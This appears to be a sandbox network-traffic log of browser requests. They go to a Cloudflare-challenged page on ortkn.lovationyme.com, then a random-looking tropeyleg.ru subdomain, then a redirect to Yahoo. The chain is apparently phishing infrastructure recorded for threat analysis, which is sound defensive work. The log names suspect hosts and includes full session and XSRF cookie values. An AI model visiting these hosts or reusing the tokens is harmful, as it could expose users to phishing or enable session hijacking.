Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8cf87240ceda19cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ortkn.lovationyme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ortkn.lovationyme.com/5wLmN/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpwMWRud2dJVENxNDdSdGpZbnJlekE9PSIsInZhbHVlIjoiU0U5SlBEd1N3TzRvU3d2eWF3K2k4Z0VCWFBJakZDdTlSTUFxS0VkMGIybWEyTjJpRVM5cDV0SFBMdDhNT0FXV1lkcGM4V1JDajNiZ3orWlJ5U09wNFVkMWVhSFhlc1BvekpZdEFWa0VNS1dRZ0x2UnhObDZVbThqSm0vZkwxZ20iLCJtYWMiOiIwY2VlMWIzYzY3NWNlYTU0Nzc2NjdmODhmMzFhNjc0OTUzMGNhYjgwM2NkYWFlYTM4OWVmNTNmMjBiZTU0NzEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjB6MWxmbWM2amhmOWYrT3lCU3ZacFE9PSIsInZhbHVlIjoibyt1Q1lQVm1pYzE3UXEzdHFDUjRnYVlJUnhPUE56bVhsUHZGV3UzazU2ZGtSbWNLRHJIb0JEdjRncmVEUUFYRVN1aGdOWnpwckc0eVp0dHIvQkVaMjFRV3piT2s0dEdFUlNnODN6bGZuNSt5M0MyWkhFUjFGWUM3d25ib2FqWE0iLCJtYWMiOiI2ZmIyOTRmYjY1YjIwZjc1ZDRjYmUzYzczYjc3NDFjMmQ3OWMxZTAzZjA0MWVkMTk2MzZhZDQwMGJjNjU1YjExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8cf87240ceda19cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8cf87240ceda19cb/1728414789424/DynHffhfYX2zijG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8cf87240ceda19cb/1728414789424/DynHffhfYX2zijG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8cf87240ceda19cb/1728414789425/ab48c5522a4143b2a8c3d5d131761a80543f5a9c6a71282f4dd847fddb4622a9/OuGk2ktq1FqICuL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A7bblgK8nv1Tko7&MD=oSn5uoTn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /006632232660803238073854jhitsjVtktHRTAPROLRPYNTLGOSRXIWYALPMAI HTTP/1.1Host: dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ortkn.lovationyme.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /006632232660803238073854jhitsjVtktHRTAPROLRPYNTLGOSRXIWYALPMAI HTTP/1.1Host: dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/6x_jt5f8kHYIVKLC8RJf3Q--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/22383490-8588-11ef-bef3-ab14bc1f4efd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/r8TW9c47hyxw22EECsC9Qw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/3e3ed6c0-859d-11ef-b251-e700ef1e3219.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/LPQ_1T.gtbBgAzFw21rhGw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/aaa8fe20-85a3-11ef-b77d-220fee758bf5.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /version/6.4.1/cmp.js HTTP/1.1Host: consent.cmp.oath.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /info/p.gif?apptype=default&beaconType=pageRenderStart&code=pageRender&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&intl=us&rid=1fkbtbdjgb12s&site=fp&t=1728414813100 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /ybar/cerebro_min.js HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/tXAWAMh378MREDEIQWaIbQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /info/p.gif?apptype=default&beaconType=pageRenderEnd&code=pageRender&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&intl=us&rid=1fkbtbdjgb12s&site=fp&t=1728414813103 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/LPQ_1T.gtbBgAzFw21rhGw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/aaa8fe20-85a3-11ef-b77d-220fee758bf5.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/o1vbp9skMm8aYhU74pmr3g--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/16f9bfa0-8532-11ef-8f7e-7d7832959f0a.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/r8TW9c47hyxw22EECsC9Qw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/3e3ed6c0-859d-11ef-b251-e700ef1e3219.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/9DG6AgnOJ2KdSpjKQ9t4uw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/21b5e300-8579-11ef-beaf-01118c908edd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ss/analytics-3.54.3.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
